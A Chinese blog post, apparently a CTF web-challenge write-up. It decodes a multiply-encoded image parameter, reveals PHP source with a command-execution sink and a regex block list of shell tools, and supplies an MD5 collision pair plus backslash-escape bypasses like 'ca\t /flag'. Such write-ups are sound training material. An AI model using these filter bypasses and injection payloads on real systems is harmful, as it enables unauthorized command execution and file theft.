|
|
8 M8 B. P, h3 j. p- v0 S" x<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
! h C" Y4 u! J<p> </p>/ N; A. E! {, f4 N( c
<p> </p>- j1 V( h* L$ T6 G$ y
<p> 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码</p>
- [- X3 H7 _# m) H7 _4 ~% A9 h<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
# C. L( h" C5 W" u& F<p> </p>5 ]& _* ^0 q4 P7 U5 [8 n1 e
<p> </p>
Q2 q7 Y6 Q5 r9 t" y8 f<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>: v# N6 \' l! E4 ^
<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>* l7 I6 _1 X+ u/ \3 P9 Z9 v) B' F
<p>首先把那个进行一次base64位解码</p>8 b) R( R9 w: M8 {! t
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>& X a9 D3 |( @, n7 S' D n
<p> </p>
2 m3 R8 w& H! A/ `, Q<p> </p>
* n) B8 I6 k2 S8 u$ K5 X- C<p> 解码一次以后还是很像base64编码,于是又解码一次</p>3 K& I: `0 W2 U. u
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
: H% A, n% |3 c! t, _/ z<p> </p>
9 c, n8 W+ N$ T* W7 U<p> </p>1 Q9 N; w/ B$ _/ b V6 ]! m
<p> 然后用hex解码一下得到了</p>1 o2 T2 }8 J- P8 {# W5 F) A: q
<div class="cnblogs_Highlighter">
. u M# p: {+ r! C: P<pre class="brush:sql;gutter:true;">555.png
2 r4 e7 e! |' X</pre>9 @5 }3 p" d' X
</div>1 z* n# {/ z' b# S; \6 b
<p> 用同样的方法把index.php进行加密</p>
& s, Y5 l3 Z; h& V<div class="cnblogs_Highlighter">' C+ z7 m. j+ |! M9 S1 c
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
; u& x, K- l3 t3 u/ k3 Y</pre>
. J' l* s5 J6 ?7 u7 `2 n</div>
! f& E: A2 r( _0 G2 K6 m: _7 A/ F<p> 然后输入到地址栏</p>
0 h. E6 [8 G, _' C F# T P<p> 然后查看源代码,把源代码里面的那一串base64的编码解码</p>
5 t6 ~, E- t' @6 r I5 ]<div class="cnblogs_code">
' K. |! X# a( B1 V- }- f5 ]<pre><?<span style="color: rgba(0, 0, 0, 1)">php
$ L: p5 d* M1 [, ^+ e; x7 t</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);+ V0 W; o2 l5 v4 R# u* K0 f% {. |- K
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);+ t) N9 E. e7 U6 r
</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
+ s: `! v) f9 K _5 T</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">])) 3 x: g& y& U. m3 f" L; A
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='<span style="color: rgba(0, 0, 0, 1)">);# z# u5 T. O( A7 V' A" V/ @% i
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));7 Q' `% R |. N6 v
C2 A/ j5 s3 ^& ^& N6 e</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
8 n+ { }+ N; W3 F& O E; p</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
, H, ~1 l$ w7 [$ O1 e1 Y </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '<img src ="./ctf3.jpeg">'<span style="color: rgba(0, 0, 0, 1)">;: c3 p4 v2 ]$ j+ x1 h1 N6 D
</span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);
6 f: t! Z+ [) B4 i8 p6 U! Z} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {2 A0 m' b! Z! A+ A5 U
</span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
$ C. `/ q. _1 I; @+ A </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'></img>"<span style="color: rgba(0, 0, 0, 1)">;: @" }, U6 e6 y$ X+ G8 P4 z
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;4 X" |+ f4 X& C2 d
}
' s: {/ N: E C! C4 k3 [$ ?# F</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
& O# g. I% [+ @2 S7 F' z+ a</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
% r+ P) K' Z; G7 C</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
( s. c) ?6 F. j: J4 K+ [7 x& I, ~6 q+ A </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);7 T. c6 ~! T( F/ N6 s
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
: `- P0 {; h4 B" U/ n} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
) c4 M& {) w; n$ l# ^ v# [ </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
9 n1 Q& c- [( K+ H2 S* @% A" ~ </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
g, u* o+ _4 C& u% g. F } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {+ {; ^+ t+ L$ @0 a: E0 m7 G( i
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
7 A: ^, U' C. p g }
, q$ \+ F) ]7 D! B. }9 ?' N0 T' f}
1 M1 g+ S& Y, q( S- `- Z
9 K0 I. N: \- f% v& M& g</span>?>
9 \" W9 S' s2 F1 Y<html>7 U7 q: k9 m/ G5 w" l1 P/ M
<style><span style="color: rgba(0, 0, 0, 1)">
* k9 P* Z* q) w6 E body{( ^+ T+ M- n6 m
background</span>:url(./bj.png) no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
3 o! @7 j0 q; G0 \3 q4 d background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;* k v! S; G9 h* p: _6 G$ v
background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
: ^! G% F% ^/ F/ C background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>, I7 O! g( a1 l8 m% a" m; G9 U
<span style="color: rgba(0, 0, 0, 1)">}
4 L E8 G- C6 n z) ]9 S</span></style>
" f" ^( ~/ q+ D1 w2 ^# Q<body>
6 F8 z5 _* ]. f( k9 K</body>
$ z! o* {5 O* j2 V</html></pre>6 X. ]; y" f* {( |3 }8 [' D/ \, c) X
</div>$ V/ w9 b! Q+ K: O
<p>结合前面的推断,关键代码就在</p>
& w3 ~" H, F! R7 n( g<div class="cnblogs_code">
5 y! w/ F2 a _<pre> <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {4 h% ~7 x$ _8 Q- B% H. L4 W
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;: j( u, p% M0 q- l( p
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {* s; l6 Y' D; ~( I* U
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
! a* O' ]! B" R- B Q }</span></pre>
]/ D/ O# b* D. o3 h1 n</div>
8 a: N6 G5 o4 Y4 e<p>这种MD5是md5强碰撞</p>
. _# C. Z$ K% U( F<div class="cnblogs_Highlighter">
' x7 O7 V/ N6 Z& g2 q9 R<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a27 _9 \; h9 u2 D3 e; \0 M
</pre>
" @' Q# q6 \4 t</div>8 L) h. }" `1 I
<div class="cnblogs_Highlighter">
( V9 }. y$ ~0 B5 I& x% L- b4 m* ~<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
6 x5 H. Y1 {( y% v</pre>
5 B2 p$ ^, f8 k \( {0 |3 |</div>: @ Y- d! _+ d/ c, y& B
<p> 只需要这样就可以把cmd里面的当成命令来处理。</p>+ X1 d9 R0 T! o6 {
<p>于是采用payload:</p>1 q7 f A1 ]7 X" X( M
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>) Y; L/ T. r+ u, n) a+ Y
<p> </p>& C& T6 Z; A. s; M F6 N$ D
<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>0 y0 H# j$ U0 P6 P1 t4 s I1 p
<p>ls和l\s在命令执行的时候结果是一样的。</p>
4 @, I1 t; K5 u2 u<p>然后发现根目录里面有/flag</p>
{8 B; ]$ j1 Y8 @; a<p>于是payload:</p>" F" `/ y; ]& j* Z
<div class="cnblogs_Highlighter">. H+ Z8 |6 }& [4 s8 M% ?
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
: G; N) y: ]' b% y. f; o% H7 K</pre>
! b4 ]2 W9 G. J, ^* a</div>
^. ?: C! H' @8 E! O! n<p> 对于这个题目,因为他没有屏蔽sort和dir</p>' e3 T5 V3 e+ }3 s
<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
6 s( \ |+ ?' }( a c+ {<p> </p>
' a4 O' k/ i$ l1 M D9 M* L* d9 O |
|